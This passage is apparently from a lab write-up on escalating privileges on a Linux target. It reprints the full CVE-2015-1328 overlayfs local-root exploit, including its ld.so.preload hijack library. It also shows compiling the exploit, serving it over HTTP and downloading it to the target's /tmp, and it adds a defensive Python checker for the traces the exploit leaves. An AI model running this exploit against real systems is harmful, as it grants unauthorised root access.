RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution | linux/webapps/45361.py
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (1) | linux/local/46359.md
runc < 1.0-rc6 (Docker < 18.09.2) - Container Breakout (2) | linux/local/46369.md
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit) | linux/remote/42084.rb
SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion | linux/webapps/44655.txt
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) | linux/local/47009.c
SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit) | linux/webapps/41697.rb
Splunk < 7.0.1 - Information Disclosure | linux/webapps/44865.txt
systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation | linux/local/43935.txt
Tenable Appliance < 4.5 - Root Remote Code Execution | linux/remote/41892.sh
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution | linux/remote/42949.txt
UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation | linux/local/42936.md
UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape | linux/local/42937.md
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution | linux/local/46973.md
Virtualmin < 3.703 - Multiple Local/Remote Vulnerabilities | linux/remote/9143.txt
WordPress Core < 4.7.4 - Unauthorized Password Reset | linux/webapps/41963.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
We use "Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation":
```
┌──(kali㉿kali)-[~/HTB/week1]
└─$ cp /usr/share/exploitdb/exploits/linux/local/37292.c .
```
Let's look at its contents:
```c
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#define _GNU_SOURCE         /* for the clone()/unshare() prototypes in <sched.h> */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <signal.h>
#include <sched.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

/* source of the helper library: a getuid() wrapper that, once su has loaded it as root, drops into a shell */
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
        // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
    chdir("/");
    umount("/tmp/ns_sploit/o");

    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
    return 0;
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);
        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");

    // the section below is what I commented out
    /*
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    */
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
```
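From the defender's side, the exploit above leaves two tell-tale traces: /etc/ld.so.preload becomes world-writable (the chmod 0777 through the overlay) and it points at a library under /tmp. The Python below is an added host-integrity check, not the exploit's or the write-up's own code; the file contents and modes it inspects are constructed samples.

```python
"""Audit /etc/ld.so.preload for the traces the overlayfs exploit above leaves.

Added example, not code from the exploit or the write-up. A healthy system
either has no /etc/ld.so.preload at all or has a root-owned, non-writable one
listing libraries under system paths; anything else deserves a look.
"""
import os
import stat
from typing import List

# Directories from which a globally preloaded library should never be loaded.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/run/user/")
# Permission bits that must never be set on /etc/ld.so.preload.
BAD_MODE_BITS = stat.S_IWGRP | stat.S_IWOTH


def audit_preload_content(content: str) -> List[str]:
    """Return one finding per suspicious library entry.

    The dynamic loader treats every whitespace-separated token as a library
    path and ignores anything after '#', so tokens are inspected one by one.
    """
    findings = []
    for lineno, raw in enumerate(content.splitlines(), 1):
        for token in raw.split("#", 1)[0].split():
            if not token.startswith("/"):
                findings.append(f"line {lineno}: relative library path {token!r}")
            elif token.startswith(UNTRUSTED_DIRS):
                findings.append(f"line {lineno}: library from untrusted dir {token!r}")
    return findings


def audit_preload_mode(st_mode: int) -> List[str]:
    """Flag a group- or world-writable ld.so.preload."""
    if st_mode & BAD_MODE_BITS:
        return [f"file mode {oct(stat.S_IMODE(st_mode))} is group/world writable"]
    return []


def audit_preload_file(path: str = "/etc/ld.so.preload") -> List[str]:
    """Audit the real file; a missing file is the normal, clean state."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return []
    findings = audit_preload_mode(st.st_mode)
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings += audit_preload_content(fh.read())
    return findings


# Constructed samples: what the exploit leaves behind, and a benign entry.
EXPLOIT_CONTENT = "/tmp/ofs-lib.so\n"
EXPLOIT_MODE = stat.S_IFREG | 0o777   # regular file, mode 0777 as the exploit sets it
BENIGN_CONTENT = "/usr/lib/x86_64-linux-gnu/libexample-hypothetical.so\n"  # made-up path
BENIGN_MODE = stat.S_IFREG | 0o644

if __name__ == "__main__":
    for name, content, mode in (("exploit", EXPLOIT_CONTENT, EXPLOIT_MODE),
                                ("benign", BENIGN_CONTENT, BENIGN_MODE)):
        found = audit_preload_mode(mode) + audit_preload_content(content)
        print(f"{name}: {found or 'clean'}")
    print("live system:", audit_preload_file() or "clean")
```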
Because the target has no gcc, every step that involves compiling has to be worked around. Here that means copying the .so the exploit needs into the target's /tmp directory and uploading an exp compiled locally. First locate the .so file:
```
┌──(kali㉿kali)-[~/HTB/week1]
└─$ locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
```
Compile the exp:
```
┌──(kali㉿kali)-[~/HTB/week1]
└─$ gcc -o exp 37292.c
37292.c: In function ‘main’:
37292.c:106:12: warning: implicit declaration of function ‘unshare’ [-Wimplicit-function-declaration]
106 | if(unshare(CLONE_NEWUSER) != 0)
| ^~~~~~~
37292.c:111:17: warning: implicit declaration of function ‘clone’; did you mean ‘close’? [-Wimplicit-function-declaration]
111 | clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
| ^~~~~
| close
37292.c:117:13: warning: implicit declaration of function ‘waitpid’ [-Wimplicit-function-declaration]
117 | waitpid(pid, &status, 0);
| ^~~~~~~
37292.c:127:5: warning: implicit declaration of function ‘wait’ [-Wimplicit-function-declaration]
127 | wait(NULL);
| ^~~~
┌──(kali㉿kali)-[~/HTB/week1]
└─$ ls
36337.py 37292.c exp
```
gcc printed warnings, but exp was built successfully. Next, copy the required .so file over:
```
┌──(kali㉿kali)-[~/HTB/week1]
└─$ cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
┌──(kali㉿kali)-[~/HTB/week1]
└─$ ls
36337.py 37292.c exp ofs-lib.so
```
Then start an HTTP server:
```
┌──(kali㉿kali)-[~/HTB/week1]
└─$ python -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
```
Because the exploit works with files under /tmp, we download into /tmp on the target:
```
/tmp # wget 192.168.64.128:8888/exp
wget 192.168.64.128:8888/exp
Connecting to 192.168.64.128:8888 (192.168.64.128:8888)
exp 100% |*******************************| 17576 0:00:00 ETA
```
One more note: the binary compiled with Kali's gcc did not seem to escalate privileges, while one compiled on Ubuntu did. I am not sure whether the operating system or the gcc version is responsible:
```
yu@yu-virtual-machine:/var/www/html$ gcc --version
gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
```

```
┌──(kali㉿kali)-[~/HTB/week1]
└─$ gcc --version
gcc (Debian 12.2.0-14) 12.2.0
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
```
In the end, privilege escalation succeeded:

![](https://qing3feng.github.io/Blogimages/vulhub打靶第一周/image-20230601204229-ontbx8a.png)